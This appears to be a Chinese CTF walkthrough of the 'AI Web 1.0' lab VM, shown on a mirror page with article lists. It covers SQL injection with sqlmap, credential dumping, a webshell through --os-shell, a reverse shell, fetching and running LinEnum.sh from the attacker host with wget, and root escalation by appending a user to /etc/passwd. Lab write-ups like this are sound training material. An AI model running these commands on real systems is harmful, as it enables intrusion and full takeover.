zoukankan
html css js c++ java
AI Web 1.0
kali:192.168.0.103
目标机:192.168.0.105
0X01 端口和目录扫描
打开目标主页没有任何信息
a) 端口扫描
只有一个80端口开启
b) 目录扫描
0x03 查看敏感目录robots
访问敏感目录地址
两个目录都没有权限访问
尝试继续挖掘
在http://192.168.0.105/m3diNf0下发现info.php文件记录这各种php信息
在
http://192.168.0.105/se3reTdir777/uploads/
没有挖到任何目录,此时回过头来看看上一级目录是什么
是一个查看信息输入框。
结合现在所得到的信息,能想到的只有输入框是否有sql注入
0X04 SQL注入
a) 验证漏洞是否存在
将1'带入输入框后报错,说明将1'数据带入到数据库了,是有注入点的
b) sqlmap跑数据库
抓包生成re.txt文件
运行sqlmap
sqlmap -r /root/re.txt --dbs --batch
最终得到的数据库账号密码
sqlmap -r /root/re.txt -D aiweb1 -T systemUser -C userName,password --batch
由此我们得到了凭证
0X05 sqlmap get webshell
sqlmap -r /root/re.txt --os-shell
这里选用自定义地址,必须是目标网站的真是物理地址,结合之前得到的phpinfo信息
网站根路径/home/www/html/web1x443290o2sdf92213
出现错误,可能是没有写入权限,试了试已知的几个路径发现/home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads/可以写入成功
0X06 系统提权
a) 反弹交互式shell
使用命令执行的方式获取反弹shell
use exploit/multi/script/web_delivery
b) 获取系统及文件信息 (使用脚本LinEnum.sh,kali开启web服务)
cd /tmp wget "http://192.168.0.103/LinEnum.sh" chmod +x LinEnum.sh ./LinEnum.sh -e /tmp
执行完上述命令后查看生成的报告,查看文件夹,以外的发现/etc/passwd对当前用户来说是可读可写可执行
c) 编辑passwd文件 添加root权限用户
perl -le 'print crypt("password@123","addedsalt")' echo "test:生成的密码:0:0:User_like_root:/root:/bin/bash" >>/etc/passwd
切换用户 su test
密码 password@123
查看全文
相关阅读:
eclipse新建工作空间后的常用设置
Maven将代码及依赖打成一个Jar包的方式
MemCache详细解读(转)
memcached单机或热备的安装部署
memcache的基本操作
Java中int和String类型之间转换
Linux中普通用户配置sudo权限(带密或免密)
Java字符串中常用字符占用字节数
java各种数据类型的数组元素的默认值
validator
原文地址:https://www.cnblogs.com/sup3rman/p/12310328.html
最新文章
NAND FLASH驱动框架以及程序实现
块设备驱动程序引入以及它的框架
AM335X的应用程序自启动流程以及U盘更新应用程序记录
AM335X的SD卡更新系统学习记录
控制Nginx上传文件大小限制(请求报文过大)
系统设计题:如何设计一个电商平台积分兑换系统!
情景linux--wc -l是用来统计文件行数的吗?
精讲#{}和${}的区别是什么?
分布式系统 CAP定理
kafka、activemq、rabbitmq、rocketmq都有什么优点和缺点啊?
热门文章
互联网大厂Java面试题:使用无界队列的线程池会导致内存飙升吗?
Redis 的持久化机制
拜托!面试请不要再问我Spring Cloud底层原理
Linux 文件和目录操作相关命令
Linux 标准目录结构(Linux 笔记)
C语言简介
海明码校验和纠错原理 详细
java 环境配置
辗转相除法 两个数的最大公约数
eclipse中使用maven搭建多模块项目
Copyright © 2011-2022 走看看